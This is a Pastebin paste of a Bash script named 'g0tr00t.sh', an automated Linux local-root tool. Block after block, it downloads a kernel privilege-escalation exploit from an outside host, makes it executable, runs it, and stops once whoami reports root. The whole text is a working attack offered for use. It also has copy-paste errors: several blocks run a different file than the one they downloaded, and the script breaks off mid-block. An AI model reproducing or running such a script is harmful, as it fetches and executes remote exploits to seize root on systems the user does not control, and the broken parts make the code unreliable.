BIe

g0tr00t.sh

BIe
Nov 21st, 2013
414
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 28.15 KB | None | 0 0
  1. #!/bin/bash
  2. #localroot 2005-2012
  3.  
  4. fcheckr00t()
  5. {
  6.     echo " [*] Downloading exploit No. $CNT.."
  7.     if [ $(whoami) = 'root' ] 2> /dev/null
  8.     then
  9.         echo " [*] g0tr00t with exploit No. $CNT"
  10.         GOTROOT=1
  11.     else
  12.         echo " [*] Failed to g0tr00t with exploit No. $CNT"
  13.         CNT=$((CNT + 1))
  14.     fi
  15. }
  16.  
  17. fcheckdep()
  18. {
  19.     if [ $(which wget) -z ] 2> /dev/null
  20.     then
  21.         if [ $(which curl) -z ] 2> /dev/null
  22.         then
  23.             echo ' [*] No downloaders found, try self-contained version..'
  24.             exit
  25.         else
  26.             DLER='curl -s -o hisetup'
  27.             CURLIT=1
  28.         fi
  29.     else
  30.         DLER='wget -q'
  31.         CURLIT=''
  32.     fi
  33. }
  34.  
  35.  
  36. fcheckdep
  37. CNT=1
  38. GOTROOT=''
  39. mkdir exploits
  40. cd exploits
  41.  
  42. if [ $GOTROOT -z ] 2> /dev/null
  43. then
  44.     $DLER http://bie.nazuka.net/localroot/1-2
  45.     if [ $CURLIT -z ] 2> /dev/null
  46.     then
  47.         chmod 777 1-2
  48.         ./1-2
  49.     else
  50.         chmod 777 hisetup
  51.         ./hisetup
  52.     fi
  53.     fcheckr00t
  54. fi
  55.  
  56. if [ $GOTROOT -z ] 2> /dev/null
  57. then
  58.     $DLER http://bie.nazuka.net/localroot/1-3
  59.     if [ $CURLIT -z ] 2> /dev/null
  60.     then
  61.         chmod 777 1-3
  62.         ./1-3
  63.     else
  64.         chmod 777 hisetup
  65.         ./hisetup
  66.     fi
  67.     fcheckr00t
  68. fi
  69.  
  70. if [ $GOTROOT -z ] 2> /dev/null
  71. then
  72.     $DLER http://bie.nazuka.net/localroot/1-4
  73.     if [ $CURLIT -z ] 2> /dev/null
  74.     then
  75.         chmod 777 1-4
  76.         ./1-4
  77.     else
  78.         chmod 777 hisetup
  79.         ./hisetup
  80.     fi
  81.     fcheckr00t
  82. fi
  83.  
  84. if [ $GOTROOT -z ] 2> /dev/null
  85. then
  86.     $DLER http://bie.nazuka.net/localroot/2.6.18-374.12.1.el5-2012
  87.     if [ $CURLIT -z ] 2> /dev/null
  88.     then
  89.         chmod 777 2.6.18-374.12.1.el5-2012
  90.         ./2.6.18-374.12.1.el5-2012
  91.     else
  92.         chmod 777 hisetup
  93.         ./hisetup
  94.     fi
  95.     fcheckr00t
  96. fi
  97.  
  98. if [ $GOTROOT -z ] 2> /dev/null
  99. then
  100.     $DLER http://bie.nazuka.net/localroot/10
  101.     if [ $CURLIT -z ] 2> /dev/null
  102.     then
  103.         chmod 777 10
  104.         ./10
  105.     else
  106.         chmod 777 hisetup
  107.         ./hisetup
  108.     fi
  109.     fcheckr00t
  110. fi
  111.  
  112. if [ $GOTROOT -z ] 2> /dev/null
  113. then
  114.     $DLER http://bie.nazuka.net/localroot/11
  115.     if [ $CURLIT -z ] 2> /dev/null
  116.     then
  117.         chmod 777 11
  118.         ./11
  119.     else
  120.         chmod 777 hisetup
  121.         ./hisetup
  122.     fi
  123.     fcheckr00t
  124. fi
  125.  
  126. if [ $GOTROOT -z ] 2> /dev/null
  127. then
  128.     $DLER http://bie.nazuka.net/localroot/12
  129.     if [ $CURLIT -z ] 2> /dev/null
  130.     then
  131.         chmod 777 12
  132.         ./12
  133.     else
  134.         chmod 777 hisetup
  135.         ./hisetup
  136.     fi
  137.     fcheckr00t
  138. fi
  139.  
  140. if [ $GOTROOT -z ] 2> /dev/null
  141. then
  142.     $DLER http://bie.nazuka.net/localroot/14
  143.     if [ $CURLIT -z ] 2> /dev/null
  144.     then
  145.         chmod 777 14
  146.         ./14
  147.     else
  148.         chmod 777 hisetup
  149.         ./hisetup
  150.     fi
  151.     fcheckr00t
  152. fi
  153.  
  154. if [ $GOTROOT -z ] 2> /dev/null
  155. then
  156.     $DLER http://bie.nazuka.net/localroot/15.sh
  157.     if [ $CURLIT -z ] 2> /dev/null
  158.     then
  159.         chmod 777 15.sh
  160.         ./15.sh
  161.     else
  162.         chmod 777 hisetup
  163.         ./hisetup
  164.     fi
  165.     fcheckr00t
  166. fi
  167.  
  168. if [ $GOTROOT -z ] 2> /dev/null
  169. then
  170.     $DLER http://bie.nazuka.net/localroot/15150
  171.     if [ $CURLIT -z ] 2> /dev/null
  172.     then
  173.         chmod 777 15150
  174.         ./15150
  175.     else
  176.         chmod 777 hisetup
  177.         ./hisetup
  178.     fi
  179.     fcheckr00t
  180. fi
  181.  
  182. if [ $GOTROOT -z ] 2> /dev/null
  183. then
  184.     $DLER http://bie.nazuka.net/localroot/15200
  185.     if [ $CURLIT -z ] 2> /dev/null
  186.     then
  187.         chmod 777 15200
  188.         ./15200
  189.     else
  190.         chmod 777 hisetup
  191.         ./hisetup
  192.     fi
  193.     fcheckr00t
  194. fi
  195.  
  196. if [ $GOTROOT -z ] 2> /dev/null
  197. then
  198.     $DLER http://bie.nazuka.net/localroot/16
  199.     if [ $CURLIT -z ] 2> /dev/null
  200.     then
  201.         chmod 777 16
  202.         ./16
  203.     else
  204.         chmod 777 hisetup
  205.         ./hisetup
  206.     fi
  207.     fcheckr00t
  208. fi
  209.  
  210. if [ $GOTROOT -z ] 2> /dev/null
  211. then
  212.     $DLER http://bie.nazuka.net/localroot/16-1
  213.     if [ $CURLIT -z ] 2> /dev/null
  214.     then
  215.         chmod 777 16-1
  216.         ./16-1
  217.     else
  218.         chmod 777 hisetup
  219.         ./hisetup
  220.     fi
  221.     fcheckr00t
  222. fi
  223.  
  224. if [ $GOTROOT -z ] 2> /dev/null
  225. then
  226.     $DLER http://bie.nazuka.net/localroot/18
  227.     if [ $CURLIT -z ] 2> /dev/null
  228.     then
  229.         chmod 777 18
  230.         ./18
  231.     else
  232.         chmod 777 hisetup
  233.         ./hisetup
  234.     fi
  235.     fcheckr00t
  236. fi
  237.  
  238. if [ $GOTROOT -z ] 2> /dev/null
  239. then
  240.     $DLER http://bie.nazuka.net/localroot/18-5
  241.     if [ $CURLIT -z ] 2> /dev/null
  242.     then
  243.         chmod 777 18-5
  244.         ./18-5
  245.     else
  246.         chmod 777 hisetup
  247.         ./hisetup
  248.     fi
  249.     fcheckr00t
  250. fi
  251.  
  252. if [ $GOTROOT -z ] 2> /dev/null
  253. then
  254.     $DLER http://bie.nazuka.net/localroot/2
  255.     if [ $CURLIT -z ] 2> /dev/null
  256.     then
  257.         chmod 777 2
  258.         ./2
  259.     else
  260.         chmod 777 hisetup
  261.         ./hisetup
  262.     fi
  263.     fcheckr00t
  264. fi
  265.  
  266. if [ $GOTROOT -z ] 2> /dev/null
  267. then
  268.     $DLER http://bie.nazuka.net/localroot/2-1
  269.     if [ $CURLIT -z ] 2> /dev/null
  270.     then
  271.         chmod 777 2-1
  272.         ./2-1
  273.     else
  274.         chmod 777 hisetup
  275.         ./hisetup
  276.     fi
  277.     fcheckr00t
  278. fi
  279.  
  280. if [ $GOTROOT -z ] 2> /dev/null
  281. then
  282.     $DLER http://bie.nazuka.net/localroot/2-6-32-46-2011
  283.     if [ $CURLIT -z ] 2> /dev/null
  284.     then
  285.         chmod 777 2-6-32-46-2011
  286.         ./2-6-32-46-2011
  287.     else
  288.         chmod 777 hisetup
  289.         ./hisetup
  290.     fi
  291.     fcheckr00t
  292. fi
  293.  
  294. if [ $GOTROOT -z ] 2> /dev/null
  295. then
  296.     $DLER http://bie.nazuka.net/localroot/2-6-37
  297.     if [ $CURLIT -z ] 2> /dev/null
  298.     then
  299.         chmod 777 2-6-37
  300.         ./2-6-37
  301.     else
  302.         chmod 777 hisetup
  303.         ./hisetup
  304.     fi
  305.     fcheckr00t
  306. fi
  307.  
  308. if [ $GOTROOT -z ] 2> /dev/null
  309. then
  310.     $DLER http://bie.nazuka.net/localroot/2-6-9-2005
  311.     if [ $CURLIT -z ] 2> /dev/null
  312.     then
  313.         chmod 777 2-6-9-2005
  314.         ./2-6-9-2005
  315.     else
  316.         chmod 777 hisetup
  317.         ./hisetup
  318.     fi
  319.     fcheckr00t
  320. fi
  321.  
  322. if [ $GOTROOT -z ] 2> /dev/null
  323. then
  324.     $DLER http://bie.nazuka.net/localroot/2-6-9-2006
  325.     if [ $CURLIT -z ] 2> /dev/null
  326.     then
  327.         chmod 777 2-6-9-2006
  328.         ./2-6-9-2006
  329.     else
  330.         chmod 777 hisetup
  331.         ./hisetup
  332.     fi
  333.     fcheckr00t
  334. fi
  335.  
  336. if [ $GOTROOT -z ] 2> /dev/null
  337. then
  338.     $DLER http://bie.nazuka.net/localroot/2.34-2011Exploit1
  339.     if [ $CURLIT -z ] 2> /dev/null
  340.     then
  341.         chmod 777 2-6-9-2006
  342.         ./2-6-9-2006
  343.     else
  344.         chmod 777 hisetup
  345.         ./hisetup
  346.     fi
  347.     fcheckr00t
  348. fi
  349.  
  350. if [ $GOTROOT -z ] 2> /dev/null
  351. then
  352.     $DLER http://bie.nazuka.net/localroot/2.4.21-2006
  353.     if [ $CURLIT -z ] 2> /dev/null
  354.     then
  355.         chmod 777 2-6-9-2006
  356.         ./2-6-9-2006
  357.     else
  358.         chmod 777 hisetup
  359.         ./hisetup
  360.     fi
  361.     fcheckr00t
  362. fi
  363.  
  364. if [ $GOTROOT -z ] 2> /dev/null
  365. then
  366.     $DLER http://bie.nazuka.net/localroot/2.4.36.92.6.27.5\ -\ 2008\ Local\ root
  367.     if [ $CURLIT -z ] 2> /dev/null
  368.     then
  369.         chmod 777 2.4.36.92.6.27.5\ -\ 2008\ Local\ root
  370.         ./2.4.36.92.6.27.5\ -\ 2008\ Local\ root
  371.     else
  372.         chmod 777 hisetup
  373.         ./hisetup
  374.     fi
  375.     fcheckr00t
  376. fi
  377.  
  378. if [ $GOTROOT -z ] 2> /dev/null
  379. then
  380.     $DLER http://bie.nazuka.net/localroot/2.6.18-164-2010
  381.     if [ $CURLIT -z ] 2> /dev/null
  382.     then
  383.         chmod 777 2.6.18-164-2010
  384.         ./2.6.18-164-2010
  385.     else
  386.         chmod 777 hisetup
  387.         ./hisetup
  388.     fi
  389.     fcheckr00t
  390. fi
  391.  
  392. if [ $GOTROOT -z ] 2> /dev/null
  393. then
  394.     $DLER http://bie.nazuka.net/localroot/2.6.18-194
  395.     if [ $CURLIT -z ] 2> /dev/null
  396.     then
  397.         chmod 777 2.6.18-194
  398.         ./2.6.18-194
  399.     else
  400.         chmod 777 hisetup
  401.         ./hisetup
  402.     fi
  403.     fcheckr00t
  404. fi
  405.  
  406. if [ $GOTROOT -z ] 2> /dev/null
  407. then
  408.     $DLER http://bie.nazuka.net/localroot/2.6.18-194.1-2010
  409.     if [ $CURLIT -z ] 2> /dev/null
  410.     then
  411.         chmod 777 2.6.18-194.1-2010
  412.         ./2.6.18-194.1-2010
  413.     else
  414.         chmod 777 hisetup
  415.         ./hisetup
  416.     fi
  417.     fcheckr00t
  418. fi
  419.  
  420. if [ $GOTROOT -z ] 2> /dev/null
  421. then
  422.     $DLER http://bie.nazuka.net/localroot/2.6.18-194.2-2010
  423.     if [ $CURLIT -z ] 2> /dev/null
  424.     then
  425.         chmod 777 2.6.18-194.2-2010
  426.         ./2.6.18-194.2-2010
  427.     else
  428.         chmod 777 hisetup
  429.         ./hisetup
  430.     fi
  431.     fcheckr00t
  432. fi
  433.  
  434. if [ $GOTROOT -z ] 2> /dev/null
  435. then
  436.     $DLER http://bie.nazuka.net/localroot/2.6.18-2011
  437.     if [ $CURLIT -z ] 2> /dev/null
  438.     then
  439.         chmod 777 2.6.18-2011
  440.         ./2.6.18-2011
  441.     else
  442.         chmod 777 hisetup
  443.         ./hisetup
  444.     fi
  445.     fcheckr00t
  446. fi
  447.  
  448. if [ $GOTROOT -z ] 2> /dev/null
  449. then
  450.     $DLER http://bie.nazuka.net/localroot/2.6.18-274-2011
  451.     if [ $CURLIT -z ] 2> /dev/null
  452.     then
  453.         chmod 777 2.6.18-274-2011
  454.         ./2.6.18-274-2011
  455.     else
  456.         chmod 777 hisetup
  457.         ./hisetup
  458.     fi
  459.     fcheckr00t
  460. fi
  461.  
  462. if [ $GOTROOT -z ] 2> /dev/null
  463. then
  464.     $DLER http://bie.nazuka.net/localroot/2.6.18-6-x86-2011
  465.     if [ $CURLIT -z ] 2> /dev/null
  466.     then
  467.         chmod 777 2.6.18-6-x86-2011
  468.         ./2.6.18-6-x86-2011
  469.     else
  470.         chmod 777 hisetup
  471.         ./hisetup
  472.     fi
  473.     fcheckr00t
  474. fi
  475.  
  476. if [ $GOTROOT -z ] 2> /dev/null
  477. then
  478.     $DLER http://bie.nazuka.net/localroot/2.6.2-hoolyshit
  479.     if [ $CURLIT -z ] 2> /dev/null
  480.     then
  481.         chmod 777 2.6.2-hoolyshit
  482.         ./2.6.2-hoolyshit
  483.     else
  484.         chmod 777 hisetup
  485.         ./hisetup
  486.     fi
  487.     fcheckr00t
  488. fi
  489.  
  490. if [ $GOTROOT -z ] 2> /dev/null
  491. then
  492.     $DLER http://bie.nazuka.net/localroot/2.6.20
  493.     if [ $CURLIT -z ] 2> /dev/null
  494.     then
  495.         chmod 777 2.6.20
  496.         ./2.6.20
  497.     else
  498.         chmod 777 hisetup
  499.         ./hisetup
  500.     fi
  501.     fcheckr00t
  502. fi
  503.  
  504. if [ $GOTROOT -z ] 2> /dev/null
  505. then
  506.     $DLER http://bie.nazuka.net/localroot/2.6.20-2
  507.     if [ $CURLIT -z ] 2> /dev/null
  508.     then
  509.         chmod 777 2.6.20-2
  510.         ./2.6.20-2
  511.     else
  512.         chmod 777 hisetup
  513.         ./hisetup
  514.     fi
  515.     fcheckr00t
  516. fi
  517.  
  518. if [ $GOTROOT -z ] 2> /dev/null
  519. then
  520.     $DLER http://bie.nazuka.net/localroot/2.6.22
  521.     if [ $CURLIT -z ] 2> /dev/null
  522.     then
  523.         chmod 777 2.6.22
  524.         ./2.6.22
  525.     else
  526.         chmod 777 hisetup
  527.         ./hisetup
  528.     fi
  529.     fcheckr00t
  530. fi
  531.  
  532. if [ $GOTROOT -z ] 2> /dev/null
  533. then
  534.     $DLER http://bie.nazuka.net/localroot/2.6.22-2008
  535.     if [ $CURLIT -z ] 2> /dev/null
  536.     then
  537.         chmod 777 2.6.22-2008
  538.         ./2.6.22-2008
  539.     else
  540.         chmod 777 hisetup
  541.         ./hisetup
  542.     fi
  543.     fcheckr00t
  544. fi
  545.  
  546. if [ $GOTROOT -z ] 2> /dev/null
  547. then
  548.     $DLER http://bie.nazuka.net/localroot/2.6.22-6-86_64-2007
  549.     if [ $CURLIT -z ] 2> /dev/null
  550.     then
  551.         chmod 777 2.6.22-6-86_64-2007
  552.         ./2.6.22-6-86_64-2007
  553.     else
  554.         chmod 777 hisetup
  555.         ./hisetup
  556.     fi
  557.     fcheckr00t
  558. fi
  559.  
  560. if [ $GOTROOT -z ] 2> /dev/null
  561. then
  562.     $DLER http://bie.nazuka.net/localroot/2.6.23-2.6.24
  563.     if [ $CURLIT -z ] 2> /dev/null
  564.     then
  565.         chmod 777 2.6.23-2.6.24
  566.         ./2.6.23-2.6.24
  567.     else
  568.         chmod 777 hisetup
  569.         ./hisetup
  570.     fi
  571.     fcheckr00t
  572. fi
  573.  
  574. if [ $GOTROOT -z ] 2> /dev/null
  575. then
  576.     $DLER http://bie.nazuka.net/localroot/2.6.23-2.6.24_2
  577.     if [ $CURLIT -z ] 2> /dev/null
  578.     then
  579.         chmod 777 2.6.23-2.6.24_2
  580.         ./2.6.23-2.6.24_2
  581.     else
  582.         chmod 777 hisetup
  583.         ./hisetup
  584.     fi
  585.     fcheckr00t
  586. fi
  587.  
  588. if [ $GOTROOT -z ] 2> /dev/null
  589. then
  590.     $DLER http://bie.nazuka.net/localroot/2.6.23-2.6.27
  591.     if [ $CURLIT -z ] 2> /dev/null
  592.     then
  593.         chmod 777 2.6.23-2.6.27
  594.         ./2.6.23-2.6.27
  595.     else
  596.         chmod 777 hisetup
  597.         ./hisetup
  598.     fi
  599.     fcheckr00t
  600. fi
  601.  
  602. if [ $GOTROOT -z ] 2> /dev/null
  603. then
  604.     $DLER http://bie.nazuka.net/localroot/2.6.24
  605.     if [ $CURLIT -z ] 2> /dev/null
  606.     then
  607.         chmod 777 2.6.24
  608.         ./2.6.24
  609.     else
  610.         chmod 777 hisetup
  611.         ./hisetup
  612.     fi
  613.     fcheckr00t
  614. fi
  615.  
  616. if [ $GOTROOT -z ] 2> /dev/null
  617. then
  618.     $DLER http://bie.nazuka.net/localroot/2.6.27.7-generi
  619.     if [ $CURLIT -z ] 2> /dev/null
  620.     then
  621.         chmod 777 2.6.27.7-generi
  622.         ./2.6.27.7-generi
  623.     else
  624.         chmod 777 hisetup
  625.         ./hisetup
  626.     fi
  627.     fcheckr00t
  628. fi
  629.  
  630. if [ $GOTROOT -z ] 2> /dev/null
  631. then
  632.     $DLER http://bie.nazuka.net/localroot/2.6.28-2011
  633.     if [ $CURLIT -z ] 2> /dev/null
  634.     then
  635.         chmod 777 2.6.28-2011
  636.         ./2.6.28-2011
  637.     else
  638.         chmod 777 hisetup
  639.         ./hisetup
  640.     fi
  641.     fcheckr00t
  642. fi
  643.  
  644. if [ $GOTROOT -z ] 2> /dev/null
  645. then
  646.     $DLER http://bie.nazuka.net/localroot/2.6.32-46.1.BHsmp
  647.     if [ $CURLIT -z ] 2> /dev/null
  648.     then
  649.         chmod 777 2.6.32-46.1.BHsmp
  650.         ./2.6.32-46.1.BHsmp
  651.     else
  652.         chmod 777 hisetup
  653.         ./hisetup
  654.     fi
  655.     fcheckr00t
  656. fi
  657.  
  658. if [ $GOTROOT -z ] 2> /dev/null
  659. then
  660.     $DLER http://bie.nazuka.net/localroot/2.6.33
  661.     if [ $CURLIT -z ] 2> /dev/null
  662.     then
  663.         chmod 777 2.6.33
  664.         ./2.6.33
  665.     else
  666.         chmod 777 hisetup
  667.         ./hisetup
  668.     fi
  669.     fcheckr00t
  670. fi
  671.  
  672. if [ $GOTROOT -z ] 2> /dev/null
  673. then
  674.     $DLER http://bie.nazuka.net/localroot/2.6.33-2011
  675.     if [ $CURLIT -z ] 2> /dev/null
  676.     then
  677.         chmod 777 2.6.18-2011
  678.         ./2.6.18-2011
  679.     else
  680.         chmod 777 hisetup
  681.         ./hisetup
  682.     fi
  683.     fcheckr00t
  684. fi
  685.  
  686. if [ $GOTROOT -z ] 2> /dev/null
  687. then
  688.     $DLER http://bie.nazuka.net/localroot/2.6.34-2011
  689.     if [ $CURLIT -z ] 2> /dev/null
  690.     then
  691.         chmod 777 2.6.34-2011
  692.         ./2.6.34-2011
  693.     else
  694.         chmod 777 hisetup
  695.         ./hisetup
  696.     fi
  697.     fcheckr00t
  698. fi
  699.  
  700. if [ $GOTROOT -z ] 2> /dev/null
  701. then
  702.     $DLER http://bie.nazuka.net/localroot/2.6.34-2011Exploit1
  703.     if [ $CURLIT -z ] 2> /dev/null
  704.     then
  705.         chmod 777 2.6.34-2011Exploit1
  706.         ./2.6.34-2011Exploit1
  707.     else
  708.         chmod 777 hisetup
  709.         ./hisetup
  710.     fi
  711.     fcheckr00t
  712. fi
  713.  
  714. if [ $GOTROOT -z ] 2> /dev/null
  715. then
  716.     $DLER http://bie.nazuka.net/localroot/2.6.34-2011Exploit2
  717.     if [ $CURLIT -z ] 2> /dev/null
  718.     then
  719.         chmod 777 2.6.34-2011Exploit2
  720.         ./2.6.34-2011Exploit2
  721.     else
  722.         chmod 777 hisetup
  723.         ./hisetup
  724.     fi
  725.     fcheckr00t
  726. fi
  727.  
  728. if [ $GOTROOT -z ] 2> /dev/null
  729. then
  730.     $DLER http://bie.nazuka.net/localroot/2.6.37
  731.     if [ $CURLIT -z ] 2> /dev/null
  732.     then
  733.         chmod 777 2.6.37
  734.         ./2.6.37
  735.     else
  736.         chmod 777 hisetup
  737.         ./hisetup
  738.     fi
  739.     fcheckr00t
  740. fi
  741.  
  742. if [ $GOTROOT -z ] 2> /dev/null
  743. then
  744.     $DLER http://bie.nazuka.net/localroot/2.6.37-rc2
  745.     if [ $CURLIT -z ] 2> /dev/null
  746.     then
  747.         chmod 777 2.6.37-rc2
  748.         ./2.6.37-rc2
  749.     else
  750.         chmod 777 hisetup
  751.         ./hisetup
  752.     fi
  753.     fcheckr00t
  754. fi
  755.  
  756. if [ $GOTROOT -z ] 2> /dev/null
  757. then
  758.     $DLER http://bie.nazuka.net/localroot/2.6.5_hoolyshit
  759.     if [ $CURLIT -z ] 2> /dev/null
  760.     then
  761.         chmod 777 2.6.5_hoolyshit
  762.         ./2.6.5_hoolyshit
  763.     else
  764.         chmod 777 hisetup
  765.         ./hisetup
  766.     fi
  767.     fcheckr00t
  768. fi
  769.  
  770. if [ $GOTROOT -z ] 2> /dev/null
  771. then
  772.     $DLER http://bie.nazuka.net/localroot/2.6.6-34
  773.     if [ $CURLIT -z ] 2> /dev/null
  774.     then
  775.         chmod 777 2.6.6-34
  776.         ./2.6.6-34
  777.     else
  778.         chmod 777 hisetup
  779.         ./hisetup
  780.     fi
  781.     fcheckr00t
  782. fi
  783.  
  784. if [ $GOTROOT -z ] 2> /dev/null
  785. then
  786.     $DLER http://bie.nazuka.net/localroot/2.6.6-34_h00lyshit
  787.     if [ $CURLIT -z ] 2> /dev/null
  788.     then
  789.         chmod 777 2.6.6-34_h00lyshit
  790.         ./2.6.6-34_h00lyshit
  791.     else
  792.         chmod 777 hisetup
  793.         ./hisetup
  794.     fi
  795.     fcheckr00t
  796. fi
  797.  
  798. if [ $GOTROOT -z ] 2> /dev/null
  799. then
  800.     $DLER http://bie.nazuka.net/localroot/2.6.6_h00lyshit
  801.     if [ $CURLIT -z ] 2> /dev/null
  802.     then
  803.         chmod 777 2.6.6_h00lyshit
  804.         ./2.6.6_h00lyshit
  805.     else
  806.         chmod 777 hisetup
  807.         ./hisetup
  808.     fi
  809.     fcheckr00t
  810. fi
  811.  
  812. if [ $GOTROOT -z ] 2> /dev/null
  813. then
  814.     $DLER http://bie.nazuka.net/localroot/2.6.7_h00lyshit
  815.     if [ $CURLIT -z ] 2> /dev/null
  816.     then
  817.         chmod 777 2.6.7_h00lyshit
  818.         ./2.6.7_h00lyshit
  819.     else
  820.         chmod 777 hisetup
  821.         ./hisetup
  822.     fi
  823.     fcheckr00t
  824. fi
  825.  
  826. if [ $GOTROOT -z ] 2> /dev/null
  827. then
  828.     $DLER http://bie.nazuka.net/localroot/2.6.8-2008.9-67-2008
  829.     if [ $CURLIT -z ] 2> /dev/null
  830.     then
  831.         chmod 777 2.6.8-2008.9-67-2008
  832.         ./2.6.8-2008.9-67-2008
  833.     else
  834.         chmod 777 hisetup
  835.         ./hisetup
  836.     fi
  837.     fcheckr00t
  838. fi
  839.  
  840. if [ $GOTROOT -z ] 2> /dev/null
  841. then
  842.     $DLER http://bie.nazuka.net/localroot/2.6.8-5_h00lyshit
  843.     if [ $CURLIT -z ] 2> /dev/null
  844.     then
  845.         chmod 777 2.6.8-5_h00lyshit
  846.         ./2.6.8-5_h00lyshit
  847.     else
  848.         chmod 777 hisetup
  849.         ./hisetup
  850.     fi
  851.     fcheckr00t
  852. fi
  853.  
  854. if [ $GOTROOT -z ] 2> /dev/null
  855. then
  856.     $DLER http://bie.nazuka.net/localroot/2.6.8_h00lyshit
  857.     if [ $CURLIT -z ] 2> /dev/null
  858.     then
  859.         chmod 777 2.6.8_h00lyshit
  860.         ./2.6.8_h00lyshit
  861.     else
  862.         chmod 777 hisetup
  863.         ./hisetup
  864.     fi
  865.     fcheckr00t
  866. fi
  867.  
  868. if [ $GOTROOT -z ] 2> /dev/null
  869. then
  870.     $DLER http://bie.nazuka.net/localroot/2.6.9
  871.     if [ $CURLIT -z ] 2> /dev/null
  872.     then
  873.         chmod 777 2.6.9
  874.         ./2.6.9
  875.     else
  876.         chmod 777 hisetup
  877.         ./hisetup
  878.     fi
  879.     fcheckr00t
  880. fi
  881.  
  882. if [ $GOTROOT -z ] 2> /dev/null
  883. then
  884.     $DLER http://bie.nazuka.net/localroot/2.6.9-2004
  885.     if [ $CURLIT -z ] 2> /dev/null
  886.     then
  887.         chmod 777 2.6.9-2004
  888.         ./2.6.9-2004
  889.     else
  890.         chmod 777 hisetup
  891.         ./hisetup
  892.     fi
  893.     fcheckr00t
  894. fi
  895.  
  896. if [ $GOTROOT -z ] 2> /dev/null
  897. then
  898.     $DLER http://bie.nazuka.net/localroot/2.6.9-2008
  899.     if [ $CURLIT -z ] 2> /dev/null
  900.     then
  901.         chmod 777 2.6.9-2008
  902.         ./2.6.9-2008
  903.     else
  904.         chmod 777 hisetup
  905.         ./hisetup
  906.     fi
  907.     fcheckr00t
  908. fi
  909.  
  910. if [ $GOTROOT -z ] 2> /dev/null
  911. then
  912.     $DLER http://bie.nazuka.net/localroot/2.6.9-34
  913.     if [ $CURLIT -z ] 2> /dev/null
  914.     then
  915.         chmod 777 2.6.9-34
  916.         ./2.6.9-34
  917.     else
  918.         chmod 777 hisetup
  919.         ./hisetup
  920.     fi
  921.     fcheckr00t
  922. fi
  923.  
  924. if [ $GOTROOT -z ] 2> /dev/null
  925. then
  926.     $DLER http://bie.nazuka.net/localroot/2.6.9-42.0.3.ELsmp
  927.     if [ $CURLIT -z ] 2> /dev/null
  928.     then
  929.         chmod 777 2.6.9-42.0.3.ELsmp
  930.         ./2.6.9-42.0.3.ELsmp
  931.     else
  932.         chmod 777 hisetup
  933.         ./hisetup
  934.     fi
  935.     fcheckr00t
  936. fi
  937.  
  938. if [ $GOTROOT -z ] 2> /dev/null
  939. then
  940.     $DLER http://bie.nazuka.net/localroot/2.6.9-42.0.3.ELsmp-2006
  941.     if [ $CURLIT -z ] 2> /dev/null
  942.     then
  943.         chmod 777 2.6.9-42.0.3.ELsmp-2006
  944.         ./2.6.9-42.0.3.ELsmp-2006
  945.     else
  946.         chmod 777 hisetup
  947.         ./hisetup
  948.     fi
  949.     fcheckr00t
  950. fi
  951.  
  952. if [ $GOTROOT -z ] 2> /dev/null
  953. then
  954.     $DLER http://bie.nazuka.net/localroot/2.6.9-55
  955.     if [ $CURLIT -z ] 2> /dev/null
  956.     then
  957.         chmod 777 2.6.9-55
  958.         ./2.6.9-55
  959.     else
  960.         chmod 777 hisetup
  961.         ./hisetup
  962.     fi
  963.     fcheckr00t
  964. fi
  965.  
  966. if [ $GOTROOT -z ] 2> /dev/null
  967. then
  968.     $DLER http://bie.nazuka.net/localroot/2.6.9-55-2007-prv8
  969.     if [ $CURLIT -z ] 2> /dev/null
  970.     then
  971.         chmod 777 2.6.9-55-2007-prv8
  972.         ./2.6.9-55-2007-prv8
  973.     else
  974.         chmod 777 hisetup
  975.         ./hisetup
  976.     fi
  977.     fcheckr00t
  978. fi
  979.  
  980. if [ $GOTROOT -z ] 2> /dev/null
  981. then
  982.     $DLER http://bie.nazuka.net/localroot/2.6.9-55-2008-prv8
  983.     if [ $CURLIT -z ] 2> /dev/null
  984.     then
  985.         chmod 777 2.6.9-55-2008-prv8
  986.         ./2.6.9-55-2008-prv8
  987.     else
  988.         chmod 777 hisetup
  989.         ./hisetup
  990.     fi
  991.     fcheckr00t
  992. fi
  993.  
  994. if [ $GOTROOT -z ] 2> /dev/null
  995. then
  996.     $DLER http://bie.nazuka.net/localroot/2.6.9-672008
  997.     if [ $CURLIT -z ] 2> /dev/null
  998.     then
  999.         chmod 777 2.6.9-672008
  1000.         ./2.6.9-672008
  1001.     else
  1002.         chmod 777 hisetup
  1003.         ./hisetup
  1004.     fi
  1005.     fcheckr00t
  1006. fi
  1007.  
  1008. if [ $GOTROOT -z ] 2> /dev/null
  1009. then
  1010.     $DLER http://bie.nazuka.net/localroot/2.6.9.2
  1011.     if [ $CURLIT -z ] 2> /dev/null
  1012.     then
  1013.         chmod 777 2.6.9.2
  1014.         ./2.6.9.2
  1015.     else
  1016.         chmod 777 hisetup
  1017.         ./hisetup
  1018.     fi
  1019.     fcheckr00t
  1020. fi
  1021.  
  1022. if [ $GOTROOT -z ] 2> /dev/null
  1023. then
  1024.     $DLER http://bie.nazuka.net/localroot/2.6.91-2007
  1025.     if [ $CURLIT -z ] 2> /dev/null
  1026.     then
  1027.         chmod 777 2.6.91-2007
  1028.         ./2.6.91-2007
  1029.     else
  1030.         chmod 777 hisetup
  1031.         ./hisetup
  1032.     fi
  1033.     fcheckr00t
  1034. fi
  1035.  
  1036. if [ $GOTROOT -z ] 2> /dev/null
  1037. then
  1038.     $DLER http://bie.nazuka.net/localroot/2007
  1039.     if [ $CURLIT -z ] 2> /dev/null
  1040.     then
  1041.         chmod 777 2007
  1042.         ./2007
  1043.     else
  1044.         chmod 777 hisetup
  1045.         ./hisetup
  1046.     fi
  1047.     fcheckr00t
  1048. fi
  1049.  
  1050. if [ $GOTROOT -z ] 2> /dev/null
  1051. then
  1052.     $DLER http://bie.nazuka.net/localroot/2009-local
  1053.     if [ $CURLIT -z ] 2> /dev/null
  1054.     then
  1055.         chmod 777 2009-local
  1056.         ./2009-local
  1057.     else
  1058.         chmod 777 hisetup
  1059.         ./hisetup
  1060.     fi
  1061.     fcheckr00t
  1062. fi
  1063.  
  1064. if [ $GOTROOT -z ] 2> /dev/null
  1065. then
  1066.     $DLER http://bie.nazuka.net/localroot/2009-wunderbar
  1067.     if [ $CURLIT -z ] 2> /dev/null
  1068.     then
  1069.         chmod 777 2009-wunderbar
  1070.         ./2009-wunderbar
  1071.     else
  1072.         chmod 777 hisetup
  1073.         ./hisetup
  1074.     fi
  1075.     fcheckr00t
  1076. fi
  1077.  
  1078. if [ $GOTROOT -z ] 2> /dev/null
  1079. then
